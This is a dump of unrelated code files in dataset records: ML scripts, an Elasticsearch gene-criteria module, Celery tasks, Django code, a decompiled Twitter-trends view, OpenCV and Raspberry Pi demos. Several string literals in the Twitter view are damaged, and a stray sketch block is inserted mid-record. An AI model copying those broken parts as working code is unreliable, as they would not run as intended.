poly.fit_transform(test_data)\n\n\n# clf = GaussianProcessClassifier()\n# res = clf.fit(actual_train_data, labels)\n# classify(\"gaussian process classifier\", res, test_filenames)\n\n# clf = GaussianNB()\n# res = clf.fit(actual_train_data, labels)\n# classify(\"gaussian NB\", res, test_filenames)\n\nrf = RandomForestClassifier(random_state=20)\nres = rf.fit(actual_train_data, labels)\nclassify(\"random forest classifier\", res, test_filenames)\n\n\nrf = RandomForestClassifier()\nres = rf.fit(actual_train_data, labels)\nclassify(\"random forest classifier no random state\", res, test_filenames)\n\n\n\nrf = RandomForestClassifier(n_estimators=30, criterion=\"gini\", min_samples_split=0.1, min_samples_leaf=0.01)\nres = rf.fit(actual_train_data, labels)\nclassify(\"random forest classifier no random 
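# --- editor's sketch (added illustration; the grid values are examples, not
# the original author's settings, which appear commented out above) ---
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV

def tune_forest(features, labels):
    grid = {"n_estimators": [10, 50, 100], "criterion": ["gini", "entropy"]}
    search = GridSearchCV(RandomForestClassifier(random_state=20), grid, cv=5)
    search.fit(features, labels)
    return search.best_params_, search.best_estimator_
# --- end sketch ---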
state\", res, test_filenames)\n\n\nrf = RandomForestClassifier(n_estimators=1000, criterion=\"entropy\", min_samples_split=0.1, min_samples_leaf=0.01, oob_score=True, max_features=None)\nres = rf.fit(actual_train_data, labels)\nclassify(\"random forest classifier no random state\", res, test_filenames)\n\n","sub_path":"train_programs/NEW_sigterm_microbenchmarks/random_forest.py","file_name":"random_forest.py","file_ext":"py","file_size_in_byte":9274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"202862865","text":"import logging\nfrom builtins import classmethod\nfrom elastic.search import ElasticQuery, Search\nfrom elastic.query import Query, BoolQuery\nfrom elastic.elastic_settings import ElasticSettings\nfrom criteria.helper.criteria import Criteria\nfrom region import utils\nfrom elastic.result import Document\nfrom criteria.helper.criteria_manager import CriteriaManager\n\nlogger = logging.getLogger(__name__)\n\n\nclass GeneCriteria(Criteria):\n\n ''' GeneCriteria class define functions for building gene criterias, each as separate index types\n\n '''\n FEATURE_TYPE = 'gene'\n\n @classmethod\n def cand_gene_in_study(cls, hit, section=None, config=None, result_container={}):\n '''function that implements the cand_gene_in_study criteria\n '''\n\n result_container_ = result_container\n feature_doc = hit['_source']\n feature_doc['_id'] = hit['_id']\n\n genes = feature_doc['genes']\n diseases = feature_doc['diseases']\n study_id = feature_doc['study_id']\n author = feature_doc['authors'][0]\n\n first_author = author['name'] + ' ' + author['initials']\n\n result_container_populated = cls.populate_container(study_id,\n first_author,\n fnotes=None, features=genes,\n diseases=diseases,\n result_container=result_container_)\n return result_container_populated\n\n @classmethod\n def cand_gene_in_region(cls, hit, section=None, config=None, result_container={}):\n '''function that implements the cand_gene_in_region criteria\n '''\n feature_doc = hit['_source']\n feature_doc['_id'] = hit['_id']\n\n disease_loci = feature_doc[\"disease_locus\"].lower()\n\n if disease_loci == 'tbc':\n return result_container\n\n genes = []\n if 'genes' in feature_doc:\n genes = feature_doc['genes']\n\n disease = None\n if 'disease' in feature_doc:\n disease = feature_doc['disease']\n\n status = None\n if 'status' in feature_doc:\n status = feature_doc['status']\n\n if genes is None or disease is None or status is None:\n return result_container\n\n if status != 'N':\n return result_container\n\n region_index = ElasticSettings.idx('REGION', idx_type='STUDY_HITS')\n (region_idx, region_idx_type) = region_index.split('/')\n\n # print(region_idx + ' ' + region_idx_type)\n\n gene_dict = cls.get_gene_docs_by_ensembl_id(genes, sources=['chromosome', 'start', 'stop'])\n\n for gene in gene_dict:\n # get position\n gene_doc = gene_dict[gene]\n # print(gene_doc.__dict__)\n build = \"38\" # get it from index name genes_hg38_v0.0.2 TODO\n seqid = getattr(gene_doc, \"chromosome\")\n start = getattr(gene_doc, \"start\")\n stop = getattr(gene_doc, \"stop\")\n # check if they overlap a region\n overlapping_region_docs = cls.fetch_overlapping_features(build, seqid, start, stop,\n idx=region_idx, idx_type=region_idx_type)\n\n region_docs = utils.Region.hits_to_regions(overlapping_region_docs)\n\n if(region_docs is None or len(region_docs) == 0):\n continue\n\n for region_doc in region_docs:\n print(region_doc.__dict__)\n region_id = getattr(region_doc, \"region_id\")\n 
region_name = getattr(region_doc, \"region_name\")\n\n result_container_populated = cls.populate_container(region_id,\n region_name,\n fnotes=None, features=[gene],\n diseases=[disease],\n result_container=result_container)\n result_container = result_container_populated\n\n return result_container\n\n @classmethod\n def tag_feature_to_disease(cls, feature_doc, section, config, result_container={}):\n\n feature_class = cls.__name__\n # Get class from globals and create an instance\n m = globals()[feature_class]()\n # Get the function (from the instance) that we need to call\n func = getattr(m, section)\n result_container_ = func(feature_doc, section, config, result_container=result_container)\n return result_container_\n\n @classmethod\n def is_gene_in_mhc(cls, hit, section=None, config=None, result_container={}):\n\n feature_id = hit['_id']\n result_container_ = cls.tag_feature_to_all_diseases(feature_id, section, config, result_container)\n return result_container_\n\n @classmethod\n def gene_in_region(cls, hit, section=None, config=None, result_container={}):\n\n try:\n padded_region_doc = utils.Region.pad_region_doc(Document(hit))\n except:\n logger.warn('Region padding error ')\n return result_container\n\n # 'build_info': {'end': 22411939, 'seqid': '1', 'build': 38, 'start': 22326008}, 'region_id': '1p36.12_008'}\n region_id = getattr(padded_region_doc, \"region_id\")\n region_name = getattr(padded_region_doc, \"region_name\")\n build_info = getattr(padded_region_doc, \"build_info\")\n diseases = getattr(padded_region_doc, \"tags\")['disease']\n seqid = build_info['seqid']\n start = build_info['start']\n end = build_info['end']\n\n gene_index = ElasticSettings.idx('GENE', idx_type='GENE')\n elastic = Search.range_overlap_query(seqid=seqid, start_range=start, end_range=end,\n idx=gene_index, field_list=['start', 'stop', '_id'],\n seqid_param=\"chromosome\",\n end_param=\"stop\", size=10000)\n result_docs = elastic.search().docs\n\n genes = set()\n for doc in result_docs:\n genes.add(doc.doc_id())\n\n result_container_populated = cls.populate_container(region_id,\n region_name,\n fnotes=None, features=genes,\n diseases=diseases,\n result_container=result_container)\n return result_container_populated\n\n @classmethod\n def exonic_index_snp_in_gene(cls, hit, section=None, config=None, result_container={}):\n\n feature_doc = hit['_source']\n feature_doc['_id'] = hit['_id']\n\n marker = None\n if 'marker' in feature_doc:\n marker = feature_doc['marker']\n\n disease = None\n if 'disease' in feature_doc:\n disease = feature_doc['disease']\n\n status = None\n if 'status' in feature_doc:\n status = feature_doc['status']\n\n if marker is None or disease is None or status is None:\n return result_container\n\n if status != 'N':\n return result_container\n\n disease_loci = feature_doc[\"disease_locus\"].lower()\n\n if disease_loci == 'tbc':\n return result_container\n\n # get marker info and gene info from function info dbsp\n # get marker doc\n query = ElasticQuery(BoolQuery(must_arr=[Query.term(\"id\", marker)]), sources=['id', 'info'])\n elastic = Search(search_query=query, idx=ElasticSettings.idx('MARKER', 'MARKER'), size=1)\n docs = elastic.search().docs\n marker_doc = None\n\n if docs is not None and len(docs) > 0:\n marker_doc = elastic.search().docs[0]\n\n if marker_doc is None:\n return result_container\n\n from marker.templatetags.marker_tags import marker_functional_info\n from marker.templatetags.marker_tags import gene_info\n\n ''' Retrieve functional information from bitfield in 
the INFO column.\n ftp://ftp.ncbi.nlm.nih.gov/snp/specs/dbSNP_BitField_latest.pdf\n\n ('has synonymous', True), ('has reference', True), ('has stop gain', False),\n ('has non-synonymous missense', False), ('has non-synonymous frameshift', False), ('has stop loss', False)])\n '''\n functional_info = marker_functional_info(marker_doc)\n # print(functional_info)\n\n is_in_exon = False\n\n if functional_info['has non-synonymous missense'] or\\\n functional_info['has synonymous'] or functional_info['has non-synonymous frameshift'] or\\\n functional_info['has reference'] or functional_info['has stop gain'] or\\\n functional_info['has stop loss']:\n is_in_exon = True\n\n # gene_symbols = []\n if is_in_exon:\n gene_ids = gene_info(marker_doc)\n ensembl_gene_ids = gene_ids.values()\n# gene_symbols.extend(list(gene_ids.keys()))\n# print(ensembl_gene_ids)\n# for gene in gene_symbols:\n# print('^^^\\t'+gene)\n else:\n return result_container\n\n dil_study_id = feature_doc['dil_study_id']\n fnotes = None\n if dil_study_id:\n query = ElasticQuery(Query.ids([dil_study_id]))\n elastic = Search(search_query=query, idx=ElasticSettings.idx('STUDY', 'STUDY'), size=1)\n study_doc = elastic.search().docs[0]\n author = getattr(study_doc, 'authors')[0]\n first_author = author['name'] + ' ' + author['initials']\n fnotes = {'linkid': dil_study_id, 'linkname': first_author}\n\n result_container_populated = cls.populate_container(marker,\n marker,\n fnotes=fnotes, features=ensembl_gene_ids,\n diseases=[disease],\n result_container=result_container)\n\n return result_container_populated\n\n @classmethod\n def fetch_disease_locus(cls, hits_docs):\n\n region_index = ElasticSettings.idx('REGIONS', idx_type='DISEASE_LOCUS')\n disease_loc_docs = []\n locus_id_set = set()\n for doc in hits_docs.docs:\n locus_id = getattr(doc, 'disease_locus')\n if locus_id not in locus_id_set:\n locus_id_set.add(locus_id)\n query = ElasticQuery(Query.ids([locus_id]))\n elastic = Search(query, idx=region_index)\n disease_loc = elastic.search().docs\n if(len(disease_loc) == 1):\n disease_loc_docs.append(disease_loc[0])\n else:\n logger.critical('disease_locus doc not found for it ' + locus_id)\n\n return disease_loc_docs\n\n @classmethod\n def get_gene_docs_by_ensembl_id(cls, ens_ids, sources=None):\n ''' Get the gene symbols for the corresponding array of ensembl IDs.\n A dictionary is returned with the key being the ensembl ID and the\n value the gene document. '''\n query = ElasticQuery(Query.ids(ens_ids), sources=sources)\n elastic = Search(query, idx=ElasticSettings.idx('GENE', idx_type='GENE'), size=len(ens_ids))\n return {doc.doc_id(): doc for doc in elastic.search().docs}\n\n @classmethod\n def get_disease_tags(cls, feature_id, idx_type=None):\n 'Function to get disease tags for a given feature_id...delegated to parent class Criteria. 
Returns disease docs'\n        idx = ElasticSettings.idx(cls.FEATURE_TYPE.upper()+'_CRITERIA')\n        docs = Criteria.get_disease_tags(feature_id, idx, idx_type)\n        return docs\n\n    @classmethod\n    def get_disease_tags_as_codes(cls, feature_id):\n        '''Function to get disease tags for a given feature_id...delegated to parent class Criteria\n        Returns disease codes'''\n        disease_docs = cls.get_disease_tags(feature_id)\n        disease_codes = [getattr(disease_doc, 'code') for disease_doc in disease_docs]\n        return disease_codes\n\n    @classmethod\n    def get_all_criteria_disease_tags(cls, qids, idx_type=None):\n\n        (idx, idx_types) = cls.get_feature_idx_n_idxtypes(cls.FEATURE_TYPE)\n\n        if idx_type is None:\n            idx_type = idx_types\n\n        criteria_disease_tags = Criteria.get_all_criteria_disease_tags(qids, idx, idx_type)\n        return(criteria_disease_tags)\n\n    @classmethod\n    def get_disease_codes_from_results(cls, criteria_results):\n        idx = ElasticSettings.idx(cls.FEATURE_TYPE.upper()+'_CRITERIA')\n        codes = Criteria.get_disease_codes_from_results(idx, criteria_results)\n        return sorted(codes)\n\n    @classmethod\n    def get_available_criterias(cls, feature=None, config=None):\n        'Function to get the available criteria for gene'\n        if config is None:\n            config = CriteriaManager.get_criteria_config()\n\n        if feature is None:\n            feature = cls.FEATURE_TYPE\n\n        available_criterias = Criteria.get_available_criterias(feature, config)\n        return available_criterias\n\n    @classmethod\n    def get_criteria_details(cls, feature_id, idx=None, idx_type=None, config=None):\n        'Function to get the criteria details for a given feature_id'\n        if idx is None:\n            idx = ElasticSettings.idx(cls.FEATURE_TYPE.upper()+'_CRITERIA')\n\n        # get all the criteria from the ini\n        criteria_list = []\n        if idx_type is None:\n            available_criterias = cls.get_available_criterias(feature=cls.FEATURE_TYPE, config=config)\n            criteria_list = available_criterias[cls.FEATURE_TYPE]\n            idx_type = ','.join(criteria_list)\n\n        result_dict = Criteria.get_criteria_details(feature_id, idx, idx_type)\n        result_dict_expanded = Criteria.add_meta_info(idx, criteria_list, result_dict)\n        print(result_dict_expanded)\n        return result_dict_expanded\n","sub_path":"criteria/helper/gene_criteria.py","file_name":"gene_criteria.py","file_ext":"py","file_size_in_byte":14269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"410983593","text":"from celery import shared_task\n\nfrom src.apps.graph.client.services import client_graph_service\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\n@shared_task\ndef create_client_in_graphdb_task(client_uid):\n    return client_graph_service.create_client_in_graphdb(client_uid)['client_uid']\n\n\n@shared_task(bind=True, max_retries=3, default_retry_delay=180)\ndef create_ta_topic_in_graphdb_task(self, client_uid, ta_topic_uid, topic_uid):\n    try:\n        return client_graph_service.create_ta_topic_in_graphdb(client_uid, ta_topic_uid, topic_uid)['ta_topic_uid']\n    except Exception as e:\n        # this can happen in the admin screen. Example: we add a topic and then sub topics. The sub-topic task runs\n        # before the main parent topic even runs. We should wait until the main topic runs, then re-do this task in that\n        # case.\n        ex = Exception(\n            \"Error creating ta topic. 
client_uid: %s ta_topic_uid: %s topic_uid: %s\" %\n            (client_uid, ta_topic_uid, topic_uid,)\n        ).with_traceback(e.__traceback__)\n\n        logger.debug(ex, exc_info=True)\n\n        self.retry(exc=ex)\n\n\n@shared_task(bind=True, max_retries=3, default_retry_delay=180)\ndef delete_client_in_graphdb_task(self, client_uid):\n    try:\n        return client_graph_service.delete_client_in_graphdb(client_uid)\n    except Exception as e:\n        logger.debug(e, exc_info=True)\n        self.retry(exc=e)\n\n\n@shared_task(bind=True, max_retries=3, default_retry_delay=180)\ndef delete_ta_topic_in_graphdb_task(self, client_uid, ta_topic_uid):\n    try:\n        return client_graph_service.delete_ta_topic_in_graphdb(client_uid, ta_topic_uid)\n    except Exception as e:\n        logger.debug(e, exc_info=True)\n        self.retry(exc=e)\n","sub_path":"src/apps/graph/client/services/client_graph_tasks.py","file_name":"client_graph_tasks.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"88024126","text":"# my first attempt at problem on p.118\n# def recursive_sum(li,s=0):\n# \ts += li.pop()\n# \tif len(li) > 0:\n# \t\treturn recursive_sum(li,s)\n# \telse:\n# \t\treturn s\n\n\n# print recursive_sum([1,2,3,4])\n\n# self check p.122\n\n# def rev(st):\n# \tst = list(st)\n# \tl = len(st)\n# \trv_st = ''\n# \tfor i in range(l):\n# \t\trv_st += st.pop()\n# \treturn rv_st\n\n# print rev('joseph')\n\t\n\n# def rev_rec(st,rv_st):\n# \tif len(st) == 1:\n# \t\trv_st += st[0]\n# \t\treturn rv_st\n# \telse:\n# \t\tst = list(st)\n# \t\trv_st += st.pop()\n# \t\treturn rev_rec(st,rv_st)\n\n# print rev_rec('joseph','')\n\n\n# # is this possible?\n# def rev_rec(st):\n# \tif len(st) == 1:\n# \t\treturn st\n# \telse:\n# \t\treturn list(st).pop() + rev_rec(st)\n\n\n# p.123 palindromer featuring recursion\n# def palin_rec(st):\n# \tif len(st) < 2:\n# \t\treturn True\n# \telif st[0] == st[-1:]:\n# \t\treturn palin_rec(st[1:-1])\n# \telse:\n# \t\treturn False\n\n# print palin_rec('josesoj')\n# print palin_rec('josetrewqlkjhgfds a sdfghjklqwertesoj')\n\n\nimport turtle\nmy_turtle = turtle.Turtle()\nmy_turtle.speed(0.0001)\nmy_win = turtle.Screen()\ndef draw_spiral(my_turtle, line_len):\n\tif line_len > 0:\n\t\tmy_turtle.forward(line_len)\n\t\tmy_turtle.right(90)\n\t\tdraw_spiral(my_turtle, line_len - 5)\ndraw_spiral(my_turtle, 100)\nmy_win.exitonclick()\n","sub_path":"chpt4.py","file_name":"chpt4.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"21655580","text":"import win32com.client\nimport webbrowser\nimport temp.temp as temp\n\nimport testHead\n\n\n\n\nexcel = win32com.client.Dispatch(\"Excel.Application\")\nexcel.Visible = True\nwb = excel.Workbooks.Add()\nws = wb.Worksheets(\"Sheet1\")\nws.Cells(1,1).Value = \"hello world\"\n\n\nexpenses =(\n    [\"test1\", 100001]\n    , [\"test2\", 100002]\n    , [\"test3\", 100003]\n    , [\"test4\", 100004]\n    , [\"test5\", 100005]\n    , [\"test6\", 100006]\n    , [\"test7\", 100007]\n)\n\nrow = 2\ncol = 1\nval = 1\n\nfor item, cost in(expenses):\n    ws.Cells(row, 1).Value = item\n    ws.Cells(row, 2).Value = cost\n    row = row +1\n\n    print(row)\n    print(item)\n    print(cost)\n\n\n\n\nurl = 'http://naver.com'\n\n# MacOS\n#chrome_path = 'open -a /Applications/Google\\ Chrome.app %s'\n\n# Windows\n# chrome_path = 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe %s'\n# webbrowser.get(chrome_path).open(url)\n#\n# print(chrome_path)\n# print(url)\n\n# 
Close\nexcel.Application.Quit()\n\n\n\nprint(temp.temp() )\n\n\n\n\n\n\n\n\n\n","sub_path":"test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"106506488","text":"from torchvision import transforms\r\n\r\nbackbone = dict(\r\n    type='ResNeXt',\r\n    depth=50,\r\n    stage_with_context_block=[False, True, True, True],\r\n    context_block_cfg=dict(ratio=1./4),\r\n    pretrained=True,)\r\n\r\ndata = dict(\r\n    dataset_path='/home1/liangjianming/imet-2019-fgvc6/train',\r\n    datalist_path='/home1/liangjianming/imet-2019-fgvc6/train.csv',\r\n    batch_size=64,\r\n    train_transform=transforms.Compose([\r\n        transforms.RandomHorizontalFlip(),\r\n        transforms.Resize((224, 224)),\r\n        transforms.ToTensor(),\r\n        transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n                             std=[0.229, 0.224, 0.225])\r\n    ]),\r\n    test_transform=transforms.Compose([\r\n        transforms.Resize((224, 224)),\r\n        transforms.ToTensor(),\r\n        transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n                             std=[0.229, 0.224, 0.225])\r\n    ]),)\r\n\r\ntrain = dict(\r\n    epoch=100,\r\n    lr=0.01,\r\n    weight_decay=0.0001,\r\n    momentum=0.9,\r\n    lr_cfg=dict(\r\n        gamma=0.1,\r\n        step=[60, 80]),\r\n    validate_thresh=1/7,\r\n    accumulate_batch_size=256,\r\n    mixup=True,\r\n    checkpoint=None,)\r\n\r\n\r\nlog = dict(\r\n    log_dir='./work_dir/resnext50/resnext50_gc_mixup',\r\n    log_file='resnext50_gc_mixup.log',\r\n    print_frequency=50,)\r\n\r\n","sub_path":"config/resnext50_gc_mixup.py","file_name":"resnext50_gc_mixup.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"33216749","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/wwp/twitter/browser/updatetweetview.py\n# Compiled at: 2009-08-20 06:55:22\nfrom zope.interface import implements, Interface\nfrom Products.Five import BrowserView\nfrom Products.CMFCore.utils import getToolByName\nfrom wwp.twitter import twitterMessageFactory as _\nimport datetime, time, twitter, find_urls, simplejson, urllib, random\n\nclass IupdatetweetView(Interface):\n    \"\"\"\n    updatetweet view interface\n    \"\"\"\n    __module__ = __name__\n\n    def test():\n        \"\"\" test method\"\"\"\n        pass\n\n\nclass updatetweetView(BrowserView):\n    \"\"\"\n    updatetweet browser view\n    \"\"\"\n    __module__ = __name__\n    implements(IupdatetweetView)\n\n    def __init__(self, context, request):\n        self.context = context\n        self.request = request\n\n    @property\n    def portal_catalog(self):\n        return getToolByName(self.context, 'portal_catalog')\n\n    @property\n    def portal(self):\n        return getToolByName(self.context, 'portal_url').getPortalObject()\n\n    def test(self):\n        \"\"\"\n        test method\n        \"\"\"\n        dummy = _('a dummy string')\n        return {'dummy': dummy}\n\n    def twitter_trends(self):\n        today = datetime.datetime.now()\n        self.context.lastupdate.append(today)\n        raw_trends = urllib.urlopen('http://search.twitter.com/trends/current.json')\n        result = simplejson.load(raw_trends)\n        trends_out = []\n        for time in result['trends']:\n            for item in result['trends'][time]:\n                trends_out.append(item['name'])\n\n        i = 0\n        trend_links = []\n        while i < len(trends_out):\n            trend_str = trends_out[i].replace(' ', '+')\n            trend_str = trend_str.replace('#', '%23')\n            trenditem = '
'\n trenditem += ''\n trend_links.append(trenditem)\n i += 1\n\n self.context.trends_info = trend_links\n if self.context.postresults:\n string_list = 'http://tiny.cc/MeYTX Top Tweets Today: ' + (', ').join(trends_out[:5])\n api = twitter.Api(username=self.context.username, password=self.context.password)\n statuses = api.PostUpdate(status=string_list[:140], in_reply_to_status_id=None)\n root_app = self.context.restrictedTraverse('news')\n news_id = 'Top tweets ' + str(today)\n news_id = news_id.replace(' ', '-')\n news_id = news_id.replace(':', '-')\n newspost_list = 'Top 10 Tweets:
' + trends_out[i] + 'Search GoogleSearch Twitter
' + ('').join(trend_links) + '
'\n news_item = root_app.invokeFactory(type_name='News Item', id=news_id, title='Top Words on ' + str(today), description='The most popular words on twitter are :', text=newspost_list)\n root_app.reindexObject()\n root_app = self.context.restrictedTraverse('news/' + news_id)\n urltool = getToolByName(self.context, 'portal_url')\n workflow = getToolByName(self.context, 'portal_workflow')\n review_state = workflow.getInfoFor(root_app, 'review_state')\n if review_state != 'published':\n error = workflow.doActionFor(root_app, 'publish', comment='publised programmatically')\n return self.context.trends_info","sub_path":"pycfiles/wwp.twitter-1.0dev-py2.4/updatetweetview.py","file_name":"updatetweetview.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"378914270","text":"import numpy as np\nimport cv2\nfrom dataPath import DATA_PATH\n\n# Read input image\nimg = cv2.imread(DATA_PATH + \"images/book.jpeg\")\n# Convert to grayscale\nimgGray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\ncv2.imshow(\"Image\",img)\ncv2.imshow(\"Gray\",imgGray)\ncv2.waitKey(0)\n\n# Initiate ORB detector\norb = cv2.ORB_create()\n\n# find the keypoints with ORB\nkp = orb.detect(imgGray,None)\n\n# compute the descriptors with ORB\nkp, des = orb.compute(imgGray, kp)\n\n# draw keypoints location, size and orientation\nimg2 = cv2.drawKeypoints(img, kp, None, color=(0,255,0), flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\ncv2.imshow(\"Keypoints\",img2)\ncv2.waitKey(0)\n\ncv2.destroyAllWindows()\n\norb = cv2.ORB_create(10)\nkp, des = orb.detectAndCompute(imgGray, None)\nimg2 = cv2.drawKeypoints(img, kp, None, color=(0,0,255), flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\ncv2.imshow(\"keypoints\",img2)\ncv2.waitKey(0)\n\ncv2.destroyAllWindows()\n","sub_path":"Course1/week7/Image_Features_ORB.py","file_name":"Image_Features_ORB.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"109508801","text":"\"\"\"\r\n\r\nQuestion 22\r\nLevel 3\r\n\r\nQuestion:\r\nWrite a program to compute the frequency of the words from the input. The output should output after sorting the key alphanumerically. \r\nSuppose the following input is supplied to the program:\r\nNew to Python or choosing between Python 2 and Python 3? Read Python 2 or Python 3.\r\nThen, the output should be:\r\n2:2\r\n3.:1\r\n3?:1\r\nNew:1\r\nPython:5\r\nRead:1\r\nand:1\r\nbetween:1\r\nchoosing:1\r\nor:2\r\nto:1\r\n\r\nHints\r\nIn case of input data being supplied to the question, it should be assumed to be a console input.\r\n\"\"\"\r\n\r\nuser_input = \"New to Python or choosing between Python 2 and Python 3? 
Read Python 2 or Python 3.\"\r\nmyList = user_input.split(\" \")\r\nmyList.sort()\r\n\r\nvipList = []\r\nwordList = []\r\n\r\nfor word in myList:\r\n\tif vipList.count(word) == 0:\r\n\t\tvipList.append(word)\r\n\t\twordList.append([word, myList.count(word)])\r\n\r\n\r\nprint(wordList)\r\n\r\n\t\t\r\n\r\n\r\n\t\r\n","sub_path":"Challenge 22 - charFrequency.py","file_name":"Challenge 22 - charFrequency.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"10312972","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('travel', '0013_auto_20150619_0530'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='milestone',\n name='arrival_date',\n field=models.DateField(verbose_name=\"date d'arrivée\"),\n ),\n ]\n","sub_path":"travel/migrations/0014_auto_20150620_0019.py","file_name":"0014_auto_20150620_0019.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"375672178","text":"from rdr_db.models import *\nfrom rest_framework import serializers\nfrom django.utils.encoding import uri_to_iri\nfrom django.urls import reverse, get_script_prefix\nimport copy\n\nclass RDRResource_Serializer(serializers.ModelSerializer):\n class Meta:\n model = RDRResource\n fields = ('__all__')\n\nclass RDRResource_Serializer_Plus(serializers.ModelSerializer):\n DetailURL = serializers.SerializerMethodField()\n updated_at = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S %Z')\n \n def get_DetailURL(self, RDRResource):\n http_request = self.context.get('request')\n if http_request:\n return http_request.build_absolute_uri(uri_to_iri(reverse('rdr-detail-rdrid', args=[RDRResource.rdr_resource_id])))\n else:\n return ''\n \n class Meta:\n model = RDRResource\n fields = copy.copy([f.name for f in RDRResource._meta.get_fields(include_parents=False)])\n fields.append('DetailURL')\n\nclass RDR_CSA_Serializer(serializers.ModelSerializer):\n csa_feature_user_description = serializers.SerializerMethodField()\n csa_email = serializers.SerializerMethodField()\n gateway_recommended_use = serializers.SerializerMethodField()\n gateway_support_attributes = serializers.SerializerMethodField()\n \n def get_csa_feature_user_description(self, RDRResource):\n return RDRResource.other_attributes['community_software_area_feature_user_description']\n def get_csa_email(self, RDRResource):\n return RDRResource.other_attributes['community_software_area_email']\n def get_gateway_recommended_use(self, RDRResource):\n return RDRResource.other_attributes['gateway_recommended_use']\n def get_gateway_support_attributes(self, RDRResource):\n try:\n return ', '.join(RDRResource.other_attributes['gateway_support']['gateway_support_attributes'])\n except:\n return None\n \n class Meta:\n model = RDRResource\n fields = ['info_resourceid', 'resource_descriptive_name', 'resource_description', 'gateway_recommended_use', 'gateway_support_attributes',\n 'csa_feature_user_description', 'csa_email' ]\n","sub_path":"django_xsede_warehouse/rdr_db/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"554967120","text":"import time\nimport random\nfrom colorsys import hsv_to_rgb\nimport board\nfrom 
digitalio import DigitalInOut, Direction\nfrom PIL import Image, ImageDraw, ImageFont\nimport adafruit_rgb_display.st7789 as st7789\n\n# Create the display\ncs_pin = DigitalInOut(board.CE0)\ndc_pin = DigitalInOut(board.D25)\nreset_pin = DigitalInOut(board.D24)\nBAUDRATE = 24000000\n\nspi = board.SPI()\ndisp = st7789.ST7789(\n spi,\n height=240,\n y_offset=80,\n rotation=180,\n cs=cs_pin,\n dc=dc_pin,\n rst=reset_pin,\n baudrate=BAUDRATE,\n)\n\n# Input pins:\nbutton_A = DigitalInOut(board.D5)\nbutton_A.direction = Direction.INPUT\n\nbutton_B = DigitalInOut(board.D6)\nbutton_B.direction = Direction.INPUT\n\nbutton_L = DigitalInOut(board.D27)\nbutton_L.direction = Direction.INPUT\n\nbutton_R = DigitalInOut(board.D23)\nbutton_R.direction = Direction.INPUT\n\nbutton_U = DigitalInOut(board.D17)\nbutton_U.direction = Direction.INPUT\n\nbutton_D = DigitalInOut(board.D22)\nbutton_D.direction = Direction.INPUT\n\nbutton_C = DigitalInOut(board.D4)\nbutton_C.direction = Direction.INPUT\n\n# Turn on the Backlight\nbacklight = DigitalInOut(board.D26)\nbacklight.switch_to_output()\nbacklight.value = True\n\n# Create blank image for drawing.\n# Make sure to create image with mode 'RGB' for color.\nwidth = disp.width\nheight = disp.height\nimage = Image.new(\"RGB\", (width, height))\n\n# Get drawing object to draw on image.\ndraw = ImageDraw.Draw(image)\n\n# Clear display.\ndraw.rectangle((0, 0, width, height), outline=0, fill=(0, 0, 0))\ndisp.image(image)\n\n# Get drawing object to draw on image.\ndraw = ImageDraw.Draw(image)\n\n# Draw a black filled box to clear the image.\ndraw.rectangle((0, 0, width, height), outline=0, fill=0)\n\nudlr_fill = \"#00FF00\"\nudlr_outline = \"#00FFFF\"\nbutton_fill = \"#FF00FF\"\nbutton_outline = \"#FFFFFF\"\n\nfnt = ImageFont.truetype(\"/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\", 30)\n\nx = width / 2 - 15\ny = height - 30\nw = 30\nh = 10\n\n\nclass DisplayImage:\n def __init__(self):\n displayImage = Image.open(\"missile.png\")\n\n\nclass Enemy:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n #draw.rectangle((x, y, x+10, y+10), outline=udlr_outline)\n \n self.image = Image.open(\"missile.png\")\n self.image = self.image.resize((width//2, height//2), Image.BICUBIC)\n #self.image = self.image.crop((self.x, self.y, self.x + width, self.y + height))\n disp.image(self.image)\n \n def move(self):\n self.y += 5\n draw.rectangle((self.x, self.y, self.x+10, self.y+10), outline=udlr_outline)\n '''\n self.image = self.image.crop((self.x, self.y, self.x + width, self.y + height))\n disp.image(self.image)\n '''\n\n\nclass SpawnEnemy():\n def __init__(self, num):\n 